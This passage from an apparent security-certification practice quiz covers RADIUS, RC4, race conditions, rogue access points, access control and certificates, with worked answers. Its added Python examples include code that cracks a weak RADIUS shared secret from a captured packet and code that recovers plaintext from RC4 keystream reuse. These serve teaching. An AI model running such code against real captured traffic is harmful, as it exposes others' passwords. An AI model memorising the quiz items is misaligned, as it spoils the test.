Quantitative risk assessment Quantitative risk assessment measures risk in exact monetary values: single loss expectancy (SLE) is the asset value multiplied by the exposure factor, and annualized loss expectancy (ALE) is the SLE multiplied by the annualized rate of occurrence (ARO). Because the output is a cost figure, it is the method you use when deciding whether a mitigation is worth its price; a control should not cost more per year than the ALE it removes. Qualitative risk assessment rates likelihood and impact on descriptive scales (such as high, medium, and low) and produces a ranking rather than a dollar figure; any numbers it uses are ordinal scores, not monetary values. Business impact analysis (BIA) distinguishes critical functions from non-urgent ones and is part of a DRP or BCP. A vulnerability assessment is an analysis of security weaknesses in an organization.

Which of the following only encrypts the password portion of a packet between the client and server?

RADIUS RADIUS hides only the User-Password attribute of the Access-Request packet sent between the client (the network access server) and the server. It does so by XORing the password with an MD5 hash of the shared secret and the request authenticator (RFC 2865), which is obfuscation rather than strong encryption, and everything else in the packet, including the user name and the NAS address, travels in cleartext. TACACS+ encrypts the entire body of each packet (only the header is in the clear). The original TACACS and XTACACS are obsolete predecessors that did not encrypt the packet body at all, so the answer for "encrypts the entire packet" is TACACS+. Where RADIUS must cross an untrusted network, carry it inside IPsec or use RADIUS over TLS (RadSec, RFC 6614) rather than relying on the shared secret alone.
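To make the "only the password portion" point concrete, here is an added example (not code from the quiz or from any RADIUS product) that implements the RFC 2865 User-Password hiding, builds a minimal Access-Request, and shows what an eavesdropper sees: the user name in the clear, the password as 16-byte blocks that anyone holding the shared secret can unwind, and a dictionary attack on a weak shared secret using nothing but the captured packet. The user, password, secret, and authenticator values are constructed for the example.

```python
import hashlib
import struct


def hide_password(password, secret, authenticator):
    """User-Password hiding from RFC 2865 section 5.2.

    The password is NUL-padded to a multiple of 16 bytes, then
    c1 = p1 XOR MD5(secret + RequestAuthenticator) and
    ci = pi XOR MD5(secret + c(i-1)) for each later block.
    """
    if len(authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    if not 1 <= len(password) <= 128:
        raise ValueError("password must be 1..128 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = bytearray(), authenticator
    for off in range(0, len(padded), 16):
        block_key = hashlib.md5(secret + prev).digest()
        c = bytes(p ^ k for p, k in zip(padded[off:off + 16], block_key))
        out += c
        prev = c
    return bytes(out)


def reveal_password(hidden, secret, authenticator):
    """Inverse of hide_password: the shared secret plus the authenticator
    copied from the captured packet recovers the password."""
    out, prev = bytearray(), authenticator
    for off in range(0, len(hidden), 16):
        c = hidden[off:off + 16]
        block_key = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ k for x, k in zip(c, block_key))
        prev = c
    return bytes(out).rstrip(b"\x00")   # caveat: a real password ending in NUL would be truncated


def _attr(attr_type, value):
    # RADIUS attribute: Type (1 byte), Length including this header (1 byte), Value
    return bytes([attr_type, 2 + len(value)]) + value


def build_access_request(user, password, secret, authenticator, identifier=1):
    """Minimal Access-Request (Code 1) carrying User-Name (1) and User-Password (2)."""
    attrs = _attr(1, user) + _attr(2, hide_password(password, secret, authenticator))
    header = struct.pack("!BBH", 1, identifier, 20 + len(attrs))
    return header + authenticator + attrs


def guess_secret(pkt, candidates):
    """Offline dictionary attack on the shared secret using one captured request:
    a wrong secret yields random bytes, the right one yields a printable password."""
    authenticator = pkt[4:20]
    hidden, pos = None, 20
    while pos + 2 <= len(pkt):
        attr_type, length = pkt[pos], pkt[pos + 1]
        if length < 2:
            break                                   # malformed attribute
        if attr_type == 2:
            hidden = pkt[pos + 2:pos + length]
        pos += length
    if hidden is None:
        return None
    for secret in candidates:
        pw = reveal_password(hidden, secret, authenticator)
        if pw and all(32 <= b < 127 for b in pw):
            return secret
    return None


if __name__ == "__main__":
    ra = bytes(range(16))                           # constructed Request Authenticator
    pkt = build_access_request(b"alice", b"hunter2", b"s3cret", ra)
    print("captured packet:", pkt.hex())
    print("user name visible:", b"alice" in pkt, "| password visible:", b"hunter2" in pkt)
    print("recovered with weak secret:", guess_secret(pkt, [b"password", b"radius", b"s3cret"]))
```

The lesson for deployment is that the shared secret is the only thing standing between a captured Access-Request and the password, so it needs to be long and random per client, and the transport should be IPsec or RadSec whenever the path is not fully trusted.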

You need to allow remote access users to log on to a network through a shared authentication database. Which of the following should you deploy?

RADIUS Remote Authentication Dial-In User Service (RADIUS) lets remote access users authenticate against a shared authentication database. When a remote user connects to a network access server (the RADIUS client), the client forwards the user's credentials to the RADIUS server in an Access-Request; the server checks them and replies with Access-Accept or Access-Reject (or Access-Challenge if a further step, such as a one-time code, is required). The client grants or refuses the connection accordingly, and the same server can front a directory such as Active Directory or LDAP so that every access device shares one credential store. A war dialer is a program attackers use to find modems on a company's remote access system; it is not a way to provide shared authentication. Answer D is incorrect. Data Encryption Standard (DES) is a symmetric (private key) cipher that can be used to encrypt files. Answer A is incorrect. Internet Protocol Security (IPsec) digitally signs and encrypts IP packets. Answer B is incorrect. Secure Shell (SSH) secures sessions between networked computers; it is most common on Unix-like systems but is also available for Windows.

You are designing a wireless network for commercial tenants in a shopping area. As a group, the tenants want to build a community network where their customers have internet access throughout the area, regardless of which retailer's network the customer is using. What technology would allow you to do that?

RADIUS federation RADIUS federation is a group of RADIUS servers that trust one another so that a user can roam between networks: the server for the network the user is visiting proxies the authentication request to the server that holds the user's account and accepts its answer. eduroam, which lets a student from one university use Wi-Fi at another, is the best-known example of this model. None of the other options, by itself, gives customers access across every tenant's network; they are authentication methods that a federation could carry. In EAP-TLS (Extensible Authentication Protocol-Transport Layer Security), EAP carries the exchange and TLS authenticates both server and client with X.509 certificates. In EAP-TTLS (Tunneled TLS), the server is authenticated with a certificate and the resulting TLS tunnel carries a simpler client authentication, such as a password, so the client does not need its own certificate. EAP-FAST (Flexible Authentication via Secure Tunneling) builds its TLS tunnel from a Protected Access Credential (PAC) instead of a server certificate and is used on wireless and point-to-point networks. Captive portals are associated with public-access Wi-Fi: after you join the network you are redirected to a web page where you sign on and accept a policy, such as an acceptable use policy, before you can proceed; they are typical of hotels, coffee shops, and airports. Wi-Fi Protected Setup (WPS) lets a device join a network using an 8-digit PIN printed on the access point (or a push button); because the PIN is validated in two halves, an attacker can brute-force it online in a few hours, so WPS should be disabled. IEEE 802.1X is the standard for port-based network access control; it allows only authenticated users onto an individual switch port or wireless association, and EAP is the framework it uses to carry the authentication.

You are currently comparing stream ciphers and block ciphers. You have decided to use only block ciphers and hash algorithms on your organization's network. Which cryptographic algorithm is a stream cipher?

RC4 RC4 is a stream cipher. Wired Equivalent Privacy (WEP) is considered insecure largely because of its improper use of RC4 (a 24-bit IV prepended to a static key, so keystreams repeat and related-key attacks apply). RC4 takes a variable-length key, from 40 up to 2048 bits; it does not provide "56-bit encryption." Although a stream cipher is a natural fit for encrypting streaming media, RC4 itself has biased output and is prohibited in TLS (RFC 7465); a modern choice would be ChaCha20 or AES in counter mode. Stream and block ciphers are the two main types of symmetric algorithms. Block ciphers process a fixed-size block of bits at a time; stream ciphers process one bit or byte at a time by XORing the data with a keystream, which is why reusing a keystream under the same key is catastrophic: XORing two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts. RC5 and RC6 are block ciphers. RC4, RC5, and RC6 do not provide one-way hashing. MD5 is a one-way hashing algorithm. One-way hashing takes input of variable length and produces a hash value of fixed length. This value is appended to the message; the receiver recomputes it with the same algorithm and, if the values match, the message was not altered in transit (to detect a deliberate change by an attacker, the hash must be keyed, as in HMAC, or signed). Hashing algorithms include MD2, MD4, MD5, HAVAL, and the Secure Hash Algorithm (SHA) variants; the MD family and SHA-1 no longer resist collisions and should not be used in new designs. Hashing is the standard way to protect the integrity of sensitive data stored in a database table. Symmetric block ciphers have modes of operation: ECB, CBC, CTR (counter mode, sometimes written CTM), and GCM. Electronic Code Book (ECB) encrypts each block independently with the raw cipher, so identical plaintext blocks yield identical ciphertext blocks. Cipher Block Chaining (CBC) XORs each plaintext block with the previous ciphertext block before encryption to increase diffusion. Counter mode (CTR) encrypts a counter and XORs the result with the data, which turns a block cipher into a stream cipher. Galois/Counter Mode (GCM) is CTR mode plus a GHASH authentication tag, providing authenticated encryption rather than merely "complicating" the encryption.
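The following is an added example (not code from the quiz) that implements RC4's key-scheduling and keystream generation, checks it against the published test vectors, and then demonstrates the keystream-reuse failure behind WEP: when two messages are encrypted under the same key, XORing the ciphertexts and one known plaintext yields the other plaintext without the key. The key and messages are constructed for the example; this code is for understanding the flaw, not for protecting data.

```python
def rc4_keystream(key):
    """RC4 key-scheduling algorithm (KSA), then the pseudo-random generation loop (PRGA)."""
    if not key:
        raise ValueError("key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                          # KSA: permute S under the key
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:                                   # PRGA: one keystream byte per call
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key, data):
    """Encrypt or decrypt (the same operation) by XORing data with the keystream."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def recover_from_keystream_reuse(c1, c2, known_p1):
    """Two messages under the same key share a keystream, so c1 XOR c2 == p1 XOR p2.
    Knowing (or guessing) p1 therefore reveals p2, with no key material at all."""
    n = min(len(c1), len(c2), len(known_p1))
    return bytes(c1[k] ^ c2[k] ^ known_p1[k] for k in range(n))


if __name__ == "__main__":
    # Published RC4 test vector: key "Key", plaintext "Plaintext" -> bbf316e8d940af0ad3
    print(rc4(b"Key", b"Plaintext").hex())

    # WEP-style mistake: a static key reused for two frames (constructed messages).
    static_key = b"wep-static-key"
    c1 = rc4(static_key, b"TRANSFER $100 TO ALICE")
    c2 = rc4(static_key, b"TRANSFER $900 TO MALLY")
    print(recover_from_keystream_reuse(c1, c2, b"TRANSFER $100 TO ALICE"))
```

WEP's 24-bit IV only delays this: after roughly 16 million frames (far fewer in practice, since many cards reset the IV) a keystream repeats and the attack above applies; the later FMS attack on weak IVs recovers the key itself.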

Your server room has most items bolted down to the floor, but some items—such as network testing tools—can be easily removed from the room. Which security control can you implement to allow for automated notification of the removal of an item from the server room?

RFID RFID (radio-frequency identification) tags could be attached to mobile items such as network testers, laptops, and so on. These tags can be extremely small and hard for an intruder to notice. Any proximity point that the item is not supposed to go past can be configured to automatically set off an alert or alarm when the RFID tag passes it. None of the other answers allow for automatic notification of item removal. Environmental monitoring is the real-time analysis of controls and programs that concern heating, ventilation, and air conditioning (HVAC) and supervisory control and data acquisition (SCADA). Electromagnetic interference (EMI) shielding is used to reduce or eliminate crosstalk and data emanation. CCTV (closed-circuit television) is used to monitor and record things that transpire within the work area, but again cannot (without the help of other software/technology) alert an administrator automatically.

You have been hired as a security consultant. The company owner asks you to implement public key encryption to protect messages traveling between two points. Which algorithm should you implement?

RSA Rivest, Shamir, Adleman (RSA) is a public key encryption algorithm. It supports encryption and digital signatures, and its security rests on the difficulty of factoring large numbers. A public key algorithm is also called an asymmetric algorithm: the public key is shared and used to encrypt, and the private key is kept secret and used to decrypt data encrypted with the matching public key (for signatures the roles reverse, with the private key signing and the public key verifying). Because RSA is slow and can only encrypt a small payload, real systems use it to encrypt or negotiate a symmetric key that then encrypts the message, and they sign with the sender's private key to provide authentication. RSA SecurID tokens are a separate product that provides a rolling one-time password. Private key encryption is also called symmetric encryption, because the same key both encrypts and decrypts. International Data Encryption Algorithm (IDEA), RC5, and Skipjack are symmetric (private key) algorithms.

Which of these options is particularly dangerous because it processes data with little or no latency?

RTOS Real-time operating systems (RTOS) are singled out because they process data with little or no latency: they run on industrial controllers, vehicles, medical devices, and other embedded systems where a missed deadline is a safety problem, so there is no room for the overhead of the usual defenses (patch cycles, agents, heavy input validation), and a successful attack has physical consequences. They are susceptible to code injection, exploitation of shared memory, priority inversion, DoS attacks, and attacks on inter-process communication. Answers D, C, and B are incorrect. The other options are security risks, but none of them is defined by processing data with little or no latency. Home automation devices, such as smart thermostats, lighting systems, and refrigerators, share the security concerns of industrial controls at the household level. Wearable devices mostly transmit over Wi-Fi or Bluetooth to a host device and are subject to attack over those links; wearables such as voice recorders, video recorders, and hidden cameras can also be used by an attacker to gather information. System on a chip (SoC) designs are common in smartphones; they should enforce a secure boot chain that only runs trusted code and builds a root of trust (RoT).

Which memory vulnerability is associated with multithreaded applications?

Race condition Race conditions occur when several threads of an application access the same variable or resource and the outcome depends on the order in which they happen to run. The classic form is check-then-act: one thread checks a value, another thread changes it, and the first thread acts on stale data, so a balance can be overdrawn or a file check bypassed (a time-of-check to time-of-use, or TOCTOU, bug). The fix is to make the check and the action a single atomic step, usually with a lock or an atomic operation. Answer B is incorrect. DLL injection forces a running process to load an attacker-supplied DLL (for example via CreateRemoteThread and LoadLibrary), so the attacker's code runs inside that process with its privileges; it is a code-execution technique, not a multithreading bug. Answer A is incorrect. A pointer dereference vulnerability (typically a NULL or dangling pointer dereference) occurs when the application reads or writes through a pointer that does not refer to valid memory, which crashes the program or, if the attacker controls the pointer, lets them read or write arbitrary memory. Answer D is incorrect. Resource exhaustion occurs when a system runs out of a limited resource, such as bandwidth, RAM, or disk space; without it the system can no longer perform as expected and fails. Weak cipher suites and implementations are a separate class of vulnerability; a SOHO router still using WEP, for example, can be broken in minutes.
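An added example (not from the quiz) of the check-then-act race just described, in Python's threading module. Two threads each try to withdraw 80 from an account holding 100. A barrier is used to force the losing interleaving deterministically: in the unlocked version both threads pass the balance check before either debits, so the account goes negative; in the locked version the check and the debit happen as one step, so the second withdrawal is refused. The account and amounts are constructed for the example.

```python
import threading


class Account:
    """Shared state: a balance plus the lock that guards it."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def withdraw_unsafe(acct, amount, sync_point=None):
    """Check-then-act with no lock. Another thread can change the balance
    between the check and the debit, so both withdrawals 'succeed'."""
    if acct.balance >= amount:                     # time of check
        if sync_point is not None:
            sync_point.wait()                      # widen the window: wait until the other thread also passed the check
        acct.balance -= amount                     # time of use, acting on a stale decision
        return True
    return False


def withdraw_safe(acct, amount, sync_point=None):
    """Same logic, but the check and the debit are one atomic step under the lock."""
    if sync_point is not None:
        sync_point.wait()                          # both threads arrive together, then serialize on the lock
    with acct.lock:
        if acct.balance >= amount:
            acct.balance -= amount
            return True
        return False


def run_two_withdrawals(withdraw, start=100, amount=80):
    """Run two concurrent withdrawals; return (final balance, sorted per-thread results)."""
    acct = Account(start)
    barrier = threading.Barrier(2)
    results = []

    def worker():
        results.append(withdraw(acct, amount, barrier))

    threads = [threading.Thread(target=worker) for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return acct.balance, sorted(results)


if __name__ == "__main__":
    print("unsafe:", run_two_withdrawals(withdraw_unsafe))   # balance goes negative
    print("safe:  ", run_two_withdrawals(withdraw_safe))     # one succeeds, one is refused
```

Without the barrier the unsafe version fails only occasionally, which is exactly why race conditions survive testing; the same pattern applies to file checks such as "verify the path, then open it", where the fix is to open first and validate the handle you actually got.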

Your client's HR practices include promotion from within, and transferring people between offices on a regular basis. It seems like the most common question you hear when employees talk on the phone is "What office are you working at now and what are you doing?" What practice will ensure that a user's permissions are relevant and current?

Recertification Recertification (also called access review) is the process of examining a user's permissions and determining whether they still need what was previously granted. For example, if someone is transferred from the Chicago, IL office to the Charlotte, NC office, it is reasonable to revoke the user's Chicago permissions. Likewise, a promotion usually requires new privileges, and it is important to examine whether the privileges from the old position are still necessary; without periodic review, permissions only accumulate (privilege creep). Answer A is incorrect. Federation, or federated identity, is the ability of a user to use a single identity across multiple businesses or networks. It differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation would help users log on from office to office, but it would not address whether their permissions match their current job role. Answer D is incorrect. A standard naming convention would resolve an issue with account names that identify job roles or locations, but it would not address current and relevant permissions. Answer C is incorrect. Transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain through the transitive relationship.

The company you work for has a large number of employees who are considered a mobile workforce. These employees need to access resources on the LAN from their home or while traveling. Which of the following tunneling/VPN solutions would be more appropriate in this situation?

Remote access A remote access VPN lets geographically dispersed users reach the intranet and other company resources over an encrypted tunnel from wherever they happen to be; it is the right fit for a mobile workforce. Answer C is incorrect. A site-to-site VPN connects two or more offices so that they appear to be on one local network; it can also be used for partner connections, but it does not help an individual user on a hotel network. Answer B is incorrect. IPsec is a protocol suite used to secure VPN traffic. A remote access VPN may well use it, but it does not determine the type of VPN deployed. Answer A is incorrect. Point-to-Point Tunneling Protocol (PPTP) rides on an ordinary Internet connection and creates a second connection (the tunnel) through which VPN traffic flows. A VPN can use PPTP, but the protocol does not define the VPN type, and PPTP's MS-CHAPv2 authentication is broken, so it should not be deployed today.

Your network is an Active Directory domain controlled by a Windows Server domain controller. The Finance group has read permission to the Reports and History shared folders and other shared folders. The Accounting group has read and write permissions to the Reports, AccountRecs, and Statements shared folders. Several users are members of both the Finance and Accounting groups. All the folders are located on a file server. The Everyone group is granted the Full Control NTFS permission for each folder through inheritance, but non-administrative users do not have the right to log on locally at the server. Access to the shared folders is managed through share permissions. It is determined that the Finance group should no longer have read access to the Reports folder. This change should not affect access permissions granted through membership in other groups. What is the best solution to the problem?

Remove the read permission from the Finance group for the Reports folder. Because the Everyone group already holds Full Control at the NTFS level, effective access here is governed by the share permissions, and a user's effective share permission is the union of everything allowed to the groups they belong to. Removing the Finance group's Read entry on the Reports share therefore stops Finance-only members from reading it, while users who are also in Accounting keep Read and Write through that group. Adding an explicit Deny for Finance would be wrong: Deny overrides Allow, so it would also lock out the users who belong to both groups. Permissions on the History and other folders are untouched.

Your organization is a subcontractor for a major government defense contractor. While writing an incident response plan, you must determine the circumstances under which to bring in an outside contractor. Which portion of the incident response plan includes this information?

Reporting and escalation guidelines An incident response plan should include reporting requirements and escalation guidelines. The reporting requirements indicate how incidents are reported, what documentation is required, and what outside agencies (if any) must be notified. The escalation guidelines indicate under what circumstances you need to ask for additional assistance, which is where the decision to bring in an outside contractor belongs. When the plan is followed, the final outcome of an incident should be a documented incident record: what happened, who responded, what the damage was, what type of incident occurred, and what escalation took place. Cyber-incident response teams should be designated well in advance and selected for their particular areas of expertise. The team should practice responses to various security incidents and usually consists of internal employees. Contractors are usually not part of the team because they are used only when needed. The plan should define the roles and responsibilities of each team member clearly. For example, first responders are responsible for securing the scene to preserve evidence; incident handlers gather evidence, secure or seize equipment, and document the scene; a designated spokesperson is the single point of contact for the media and delivers the appropriate message on behalf of the company. Because contractors are not part of the team, they do not have an assigned role as a permanent part of the plan; if a contractor is needed, they are contacted at that time, and a separate contract, not the incident response plan, spells out their role and responsibilities. An exercise requirement should also be included in the plan.
By using a mock incident as an exercise or drill, this would allow for training and evaluation of the effectiveness of a response or containment activity.An incident response plan should outline the incident types and category definitions. These definitions help dictate how the incident is handled, what actions the incident response team should take, and data collection and evidence gathering. For example, an incident response plan should define incident types that would be handled internally and incident types that should be turned over to law enforcement. You would also categorize the incident types by severity of impact, with each category having clearly defined response times, which resources would be assigned to the incident, and what should be done to prepare for the possibility of that incident.

Your Windows domain has additional servers configured as member servers. Your job is to minimize the risk of unauthorized persons logging on locally to the member servers. Your solution should have a minimal impact on local management and administration and should not limit administrator access. Which of the following are the best solutions?

Require strong passwords. Rename the local default accounts. Renaming the local default accounts (which includes the built-in Administrator account) means an attacker cannot simply assume which user name carries administrative rights; most people know that the default administrative account in Windows is named Administrator, so renaming it adds a layer. Be aware that it is a thin layer: the built-in Administrator always has relative identifier (RID) 500, and tools that enumerate local accounts will still find it, so renaming must be paired with a strong password. Requiring strong passwords is always a good idea and helps prevent an unauthorized user from logging on to the member server. On older Windows versions the Administrator account could ship with a blank password; on current versions it is disabled by default, but it is still standard practice to rename it and set a complex password, or to manage it with LAPS so that each server's local administrator password is unique. Disabling account lockout policies makes the server less secure. Services do run under built-in accounts by default; that is not a local logon exposure to fix here. Disabling the local default accounts would also disable the Administrator account, and the question specifies that administrator access must not be limited. It is never a good idea to provide backdoors into servers or devices; if backdoors are found, they should be eliminated or reported to the software vendor. Beyond the listed answers, the user right "Deny log on locally" (or restricting "Allow log on locally" to Administrators) is the most direct way to stop ordinary users from logging on at the console without touching administrator access.

You are the systems administrator for your organization. Human resources notifies you that a particular user has been terminated. What should you do?

Retain the user's data for a specific amount of time. Disable the user's account. When a user is terminated, standard policy is to disable (not delete) the account immediately and to retain the user's data for the period stated in the policy. Deleting the account loses the audit trail and any encryption keys tied to it and leaves files owned by an orphaned SID that can no longer be resolved. Disabling should be paired with revoking active sessions and tokens, resetting the password, and collecting badges and devices, since a disabled account does not end sessions that are already open.

Susan is in charge of installing a business-critical application on an Internet-facing server. She is going to update the application to the most current version. What other security control should she perform in conjunction with the update?

Review and apply vendor-provided hardening documentation Third-party applications usually come with documentation that includes hardening guidance: default accounts to remove, services and sample content to disable, file permissions, and TLS settings. This vendor documentation should be applied as part of the same change as the update, because an upgrade can reintroduce insecure defaults and is the moment when the configuration is being reviewed anyway. It is the best answer for what to do in conjunction with the update. Running a port scan is a good idea at some point, but it is about finding unnecessary open ports and services rather than securing the application itself. An Internet-facing server should still sit behind a firewall (and typically a web application firewall) that permits only the ports the application needs; "Internet-facing" describes what the server is exposed to, not the absence of a filtering device. The firewall rules should be checked so that the application can fetch its updates, but some applications must be updated manually, depending on the application's security requirements and organizational policy.

Your organization (ABC-Services Corp.) has three separate wireless networks used for varying purposes. You conducted a site survey and found the following information from your scans:

SSID      State      Channel  Level
ABC-WAP1  Connected  1        80 dBm
ABC-WAP2  Connected  6        90 dBm
ABC-WAP3  Connected  11       75 dBm
ABC-WAP4  Connected  4        65 dBm

Rogue access point It appears from the information given that there is a rogue access point (ABC-WAP4). This could be a WAP that was forgotten about, or one that was placed inside the network deliberately and maliciously. The question states there are three wireless networks, and the first three WAPs use the three nonoverlapping 2.4 GHz channels (1, 6, and 11), which is how a planned deployment looks. The fourth WAP uses channel 4, which overlaps with both channel 1 and channel 6 (2.4 GHz channels are 22 MHz wide on 5 MHz spacing, so any two channels fewer than five apart overlap), and it has the weakest signal level reading, so it is probably somewhere near the physical perimeter of your building. To mitigate the issue, this WAP should be physically located (by walking toward increasing signal strength) and taken offline; capture its configuration and logs before wiping it, and check whether the SSID name was chosen to blend in with yours. Wireless jamming would cause one or more of the WAPs to fail and cause connectivity issues for wireless users; nothing in the scenario suggests that. Packet sniffing is capturing data that crosses the network; it could be happening if an attacker is monitoring the fourth WAP, but the scan does not tell you that. Near field communication (NFC) is a standard smartphones use to establish radio communications over very short distances (often by touching two devices together or bringing them very close).
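An added example (not from the quiz) that turns the reasoning above into a check you can run over site-survey output: it parses the table, compares each SSID against an assumed inventory of sanctioned access points and their planned channels, and reports every pair of channels that overlap on the 2.4 GHz band. The survey text is the question's table, constructed here as a string; real survey tools also report the BSSID, which is what you would key on to catch an evil twin that copies a legitimate SSID.

```python
# Site-survey output from the question, constructed here as text.
SURVEY = """\
SSID      State      Channel  Level
ABC-WAP1  Connected  1        80 dBm
ABC-WAP2  Connected  6        90 dBm
ABC-WAP3  Connected  11       75 dBm
ABC-WAP4  Connected  4        65 dBm
"""

# Assumed inventory: sanctioned SSID -> planned channel.
AUTHORIZED = {"ABC-WAP1": 1, "ABC-WAP2": 6, "ABC-WAP3": 11}


def parse_survey(text):
    """Parse 'SSID State Channel Level' rows; the header line is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 4:
            continue                                  # blank or malformed row
        rows.append({"ssid": parts[0], "state": parts[1],
                     "channel": int(parts[2]), "level": int(parts[3])})
    return rows


def channels_overlap(a, b):
    """2.4 GHz channels are 22 MHz wide on 5 MHz spacing, so two different
    channels fewer than five apart overlap; 1, 6 and 11 are the clean set."""
    return a != b and abs(a - b) < 5


def analyze(text, authorized=AUTHORIZED):
    """Return (subject, finding) pairs: unknown SSIDs, channel drift, and overlaps."""
    rows = parse_survey(text)
    findings = []
    for r in rows:
        if r["ssid"] not in authorized:
            findings.append((r["ssid"], "rogue: SSID not in inventory"))
        elif authorized[r["ssid"]] != r["channel"]:
            findings.append((r["ssid"], "channel differs from plan"))
    for i, a in enumerate(rows):                      # every pair, sanctioned or not
        for b in rows[i + 1:]:
            if channels_overlap(a["channel"], b["channel"]):
                findings.append((f"{a['ssid']}/{b['ssid']}",
                                 f"channels {a['channel']} and {b['channel']} overlap"))
    return findings


if __name__ == "__main__":
    for subject, finding in analyze(SURVEY):
        print(f"{subject:20} {finding}")
```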

You have been commissioned by a customer to implement a network access control model that limits remote users' network usage to normal business hours only. You create one policy that applies to all the remote users. What access control model are you implementing?

Role-based access control Role-based access control (RBAC) works with sets of permissions; each set of permissions constitutes a role. Users are assigned to roles to gain access to resources. Examples of user groups that are assigned to roles include remote users, extranet users, guests, and so on. In this question, the remote users are the group that has been assigned a role that enables them to access the network only during normal business hours. Role-based access control should not be confused with rule-based access control, which is a type of mandatory access control (MAC). MAC is an access control policy determined by a computer system and not by a user or owner. Discretionary access control (DAC) is generally determined by the owner of a resource.

Which of these is part of a scan to identify a common misconfiguration?

Router with a default password Looking for a router with a default password would be part of a scan to identify common misconfigurations. When you attempt to identify common misconfigurations, you are looking for areas where out-of-the-box solutions were not configured to be secure before being placed in the network. Answer B is incorrect. A password policy is not a common misconfiguration. When you passively test security controls, you are performing a vulnerability scan to identify weakness, but not exploiting those weaknesses. Testing security controls usually includes testing the password policy.Answer A is incorrect. You would not perform a dictionary attack or packet sniffing to identify common misconfigurations. When you are scanning to identify a vulnerability (or several vulnerabilities), you are primarily looking for common misconfigurations and/or a lack of security controls. Once a vulnerability is discovered, a dictionary attack or packet sniffing attack may be possible.Answer D is incorrect. When you scan to identify lack of security controls, you are looking for things like appropriate access controls, authentication controls, input validation, and proper logging, among others. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability.

Which of the following is a trusted OS implementation used to prevent malicious code from executing on Linux platforms?

SELinux Security-Enhanced Linux (SELinux) is a feature that supports mandatory access control and includes modifications that add security to Linux distributions to help prevent malicious and suspicious code from executing. System File Checker (SFC) is a utility in Windows that checks the integrity of system files and replaces them if necessary. Tripwire is Linux-based open source software designed to check data integrity and alert users to changes. Vmlinuz is a compressed bootable version of the Linux kernel.

Alice has read and write access to a database. Bob, her subordinate, only has read access. Alice needs to leave to go to a conference. Which access control type should you implement to trigger write access for Bob when Alice is not onsite?

Rule-based access control You would want to write a rule that automatically gives Bob write access to the database when Alice is gone. This is an example of rule-based access control. In this type of access control model, the security administrator writes the rule and allows the computer to automate the action of the rule when necessary. Discretionary access control (DAC) is when the user has ownership of the resource in question and can create permissions as necessary. Mandatory access control (MAC) is similar to rule-based access control; in fact, rule-based access control is a subset of MAC. However, MAC is controlled by the system and does not work at this type of depth concerning rules. Role-based access control (RBAC) concerns users and their roles in the organization, including which groups they are members of, and applies rights and permissions accordingly. Attribute-based access control (ABAC) is a context-aware model that utilizes dynamic authentication and bases its decisions on the results of IF-THEN statements.

You have been asked to implement the e-mail security method that is defined in RFC 2632 and RFC 2634. Which e-mail security method should you implement?

S/MIME Secure Multipurpose Internet Mail Extension (S/MIME) version 3 is an e-mail security method that is defined in Request for Comments (RFC) 2632 and RFC 2634. S/MIME 3 provides non-repudiation, authentication, and integrity for e-mail messages. Privacy Enhanced Mail (PEM) and MIME Object Security Services (MOSS) are older proposals for e-mail security standards that have not been adopted. Pretty Good Privacy (PGP) is the current de facto e-mail security standard. The Internet Engineering Task Force (IETF) is currently developing a version of PGP known as Open-PGP.

You need to include some additional information in the certificate definition. Specifically, you would like to include the host name associated with the certificate. Which of the following would provide a solution?

SAN A Subject Alternative Name (SAN) is a field in the certificate definition that allows you to stipulate additional information, such as an IP address or host name, associated with the certificate. Answer A is incorrect. Machine/computer certificates are assigned to a designated machine. During authentication, the computer (or machine) requesting access must supply the certificate assigned to it. These certificates do not always include host name information. Answer B is incorrect. Domain validation certificates are very common. They are low-cost, and are often used by web admins to offer TLS to a domain. They are validated using only the domain name. However, they do not allow you to configure alternate information in the certificate. These certificates do not always include host name information. Answer C is incorrect. Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates require the most effort by the CA to validate and provide a higher level of trust than domain validation because they are validated using more than the domain information, including the host name. You should also be familiar with email certificates, code signing certificates, user certificates, and root certificates. User certificates are assigned to individual users, much like machine/computer certificates are assigned to individual machines. Users must provide their assigned certificate for authentication prior to accessing certain resources. Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital "signature" for that email. Code signing certificates are used for code that is distributed over the Internet, including programs or applications. Code signing certificates verify the code's origin and help the user trust that the claimed sender is indeed the originator. Root certificates define the root CA and validate all other certificates issued by that CA. They are at the top of the CA hierarchy. They are self-signed and are closely guarded.

Which of the following protocols operates at the highest layer of the OSI model?

SCP SCP (Secure Copy) is a protocol/application used to transfer files securely between computers. It relies on Secure Shell (SSH) and uses port 22, and it is an application, and therefore resides on the application layer (layer 7), the highest layer of the OSI model, as does SSH. Because the OSI model is normally represented with a top-down approach, the application layer is at the top, and is considered "highest." IPsec is a protocol used to secure IP communications, for example within Layer 2 Tunneling Protocol (L2TP) VPN connections; it is a network layer (layer 3) protocol. TCP resides on the transport layer (layer 4). ICMP (Internet Control Message Protocol) resides on the network layer (layer 3), and is instrumental in testing networking connections; for example, with the ping command.

You analyze the network and see that a lot of data is being transferred on port 22. Which of the following sets of protocols is most likely being used?

SCP and SFTP SCP (Secure Copy) and SFTP (Secure FTP) both rely on SSH, which uses port 22. SSL uses port 443. Telnet uses port 23. FTP uses port 21, and TFTP uses port 69.

When calculating risks by using the quantitative method, what is the result of multiplying the asset values by the exposure factor (EF)?

